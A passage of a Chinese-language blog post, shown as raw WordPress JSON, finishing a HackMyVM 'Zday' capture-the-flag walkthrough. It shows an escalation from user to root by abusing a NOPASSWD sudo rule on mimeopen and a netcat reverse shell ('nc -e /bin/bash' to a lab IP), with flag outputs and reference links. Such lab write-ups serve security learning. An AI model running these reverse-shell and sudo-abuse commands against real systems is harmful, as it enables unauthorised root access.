   \/.                                            .*.                \n             *                                                  **              \n             ,*                                               ,*                \n                **                                          *.                  \n                   **                                    **.                    \n                     ,*                                **                       \n                        *,                          ,*                          \n                           *                      **                            \n                             *,                .*                               \n                                *.           **                                 \n                                  **      ,*,                                   \n                                     ** *,     \\033[0m\n-------------------------\n\\nPWNED HOST: zday\n\\nPWNED DATE: Sat Jun 14 03:09:38 EDT 2025\n\\nWHOAMI: uid=1000(estas) gid=1000(estas) groups=1000(estas),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)\n\\nFLAG: whereihavebeen\n\\n------------------------\n(remote) estas@zday:\/home\/estas$ cat user.txt\nwhereihavebeen\n(remote) estas@zday:\/home\/estas$ sudo -l\nMatching Defaults entries for estas on zday:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser estas may run the following commands on zday:\n    (ALL : ALL) NOPASSWD: \/usr\/bin\/mimeopen\n(remote) estas@zday:\/home\/estas$ sudo \/usr\/bin\/mimeopen --help\nUsage:\n    mimeopen [options] [-] files\n\nOptions:\n    -a, --ask\n        Do not execute the default application but ask which application to\n        run. This does not change the default application.\n\n    -d, --ask-default\n        Let the user choose a new default program for given files.\n\n    -n, --no-ask\n        Don&#039;t ask the user which program to use. Choose the default program\n        or the first program known to handle the file mimetype. This does\n        not set the default application.\n\n    -M, --magic-only\n        Do not check for extensions, globs or inode type, only look at the\n        content of the file. This is particularly useful if for some reason\n        you don&#039;t trust the name or the extension a file has.\n\n    --database=mimedir:mimedir:...\n        Force the program to look in these directories for the shared\n        mime-info database. The directories specified by the basedir\n        specification are ignored.\n\n    -D, --debug\n        Print debug information about how the mimetype was determined.\n\n    -h, --help\n    -u, --usage\n        Print a help message and exits.\n\n    -v, --version\n        Print the version of the program and exit.<\/code><\/pre>\n<h4>mimeopen\u6267\u884c\u547d\u4ee4<\/h4>\n<p>\u5565\u554a\u8fd9\u662f\u3002\u3002\u3002\u3002\u5c1d\u8bd5\u7528\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) estas@zday:\/home\/estas$ sudo \/usr\/bin\/mimeopen user.txt\nPlease choose a default application for files of type text\/plain\n\n        1) Vim  (vim)\n        2) Other...\n\nuse application #1\nOpening &quot;user.txt&quot; with Vim  (text\/plain)\nCan&#039;t exec &quot;xterm&quot;: No such file or directory at \/usr\/share\/perl5\/File\/DesktopEntry.pm line 247, &lt;STDIN&gt; line 1.\n\n(remote) estas@zday:\/home\/estas$ sudo \/usr\/bin\/mimeopen flag.sh \nPlease choose a default application for files of type application\/x-shellscript\n\n        1) Vim  (vim)\n        2) Other...\n\nuse application #2\nuse command: whoami\nOpening &quot;flag.sh&quot; with whoami  (application\/x-shellscript)\nwhoami: extra operand &#039;flag.sh&#039;\nTry &#039;whoami --help&#039; for more information.<\/code><\/pre>\n<p>\u8bf4\u660e\u524d\u540e\u53ef\u80fd\u6709\u5173\u8054\uff0c\u597d\u50cf\u662f\u540e\u9762\u7684\u6307\u4ee4\u7528\u6765\u8bfb\u53d6\u6267\u884c\u524d\u9762\u7684\u6587\u4ef6\uff1f\u5c1d\u8bd5\u501f\u6b64\u6267\u884c\u4e00\u4e0b\u547d\u4ee4\uff0c\u7136\u540e\u5c31\u591a\u6b21\u5c1d\u8bd5\uff0c\u76f4\u5230\u7075\u5149\u4e00\u73b0\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) estas@zday:\/tmp$ echo &#039;nc -e \/bin\/bash 192.168.10.102 2345&#039; &gt; temp\n(remote) estas@zday:\/tmp$ chmod +x temp\n(remote) estas@zday:\/tmp$ sudo \/usr\/bin\/mimeopen -d temp\nPlease choose a default application for files of type application\/x-shellscript\n\n        1) chmod  (chmod-usercreated-1)\n        2) Vim  (vim)\n        3) su  (su-usercreated-1)\n        4) Other...\n\nuse application #4\nuse command: bash\nOpening &quot;temp&quot; with bash  (application\/x-shellscript)\nstty: &#039;standard input&#039;: Inappropriate ioctl for device\n<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355719.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355719.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614153613690\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u62ff\u4e0brootshell\uff01\uff01\uff01\uff01\uff01<\/p>\n<pre><code class=\"language-bash\">(remote) root@zday:\/tmp# cd ~\n(remote) root@zday:\/root# ls -la\ntotal 36\ndrwx------  4 root root 4096 Jun 14 03:14 .\ndrwxr-xr-x 21 root root 4096 Mar 10  2021 ..\n-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc\ndrwxr-xr-x  2 root root 4096 Jun 14 03:14 .config\ndrwxr-xr-x  3 root root 4096 Mar 10  2021 .local\n-rw-r--r--  1 root root  148 Aug 17  2015 .profile\n-rw-r--r--  1 root root  209 Mar 10  2021 .wget-hsts\n-rwx--x--x  1 root root 1920 Mar 10  2021 flag.sh\n-rw-------  1 root root   20 Mar 10  2021 root.txt\n(remote) root@zday:\/root# .\/flag.sh\n\\033[0;35m\n                                   .     **                                     \n                                *           *.                                  \n                                              ,*                                \n                                                 *,                             \n                         ,                         ,*                           \n                      .,                              *,                        \n                    \/                                    *                      \n                 ,*                                        *,                   \n               \/.                                            .*.                \n             *                                                  **              \n             ,*                                               ,*                \n                **                                          *.                  \n                   **                                    **.                    \n                     ,*                                **                       \n                        *,                          ,*                          \n                           *                      **                            \n                             *,                .*                               \n                                *.           **                                 \n                                  **      ,*,                                   \n                                     ** *,     \\033[0m\n-------------------------\n\\nPWNED HOST: zday\n\\nPWNED DATE: Sat Jun 14 03:37:01 EDT 2025\n\\nWHOAMI: uid=0(root) gid=0(root) groups=0(root)\n\\nFLAG: ihavebeenherealways\n\\n------------------------\n(remote) root@zday:\/root# cat root.txt \nihavebeenherealways<\/code><\/pre>\n<h2>\u53c2\u8003<\/h2>\n<p><a href=\"https:\/\/sarthakrsc21.medium.com\/hackmyvm-zday-write-up-b5642667609d\">https:\/\/sarthakrsc21.medium.com\/hackmyvm-zday-write-up-b5642667609d<\/a><\/p>\n<p><a href=\"https:\/\/www.bilibili.com\/video\/BV17g4y1e7qu\">https:\/\/www.bilibili.com\/video\/BV17g4y1e7qu<\/a><\/p>\n<p><a href=\"https:\/\/tryhackmyoffsecbox.github.io\/Target-Machines-WriteUp\/docs\/HackMyVM\/Machines\/Zday\/\">https:\/\/tryhackmyoffsecbox.github.io\/Target-Machines-WriteUp\/docs\/HackMyVM\/Machines\/Zday\/<\/a><\/p>\n<p><a href=\"https:\/\/alientec1908.github.io\/Zday_HackMyVM_Hard\/\">https:\/\/alientec1908.github.io\/Zday_HackMyVM_Hard\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Zday \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday] \u2514\u2500$ rustsca [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-878","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/878","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=878"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/878\/revisions"}],"predecessor-version":[{"id":879,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/878\/revisions\/879"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=878"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=878"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=878"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}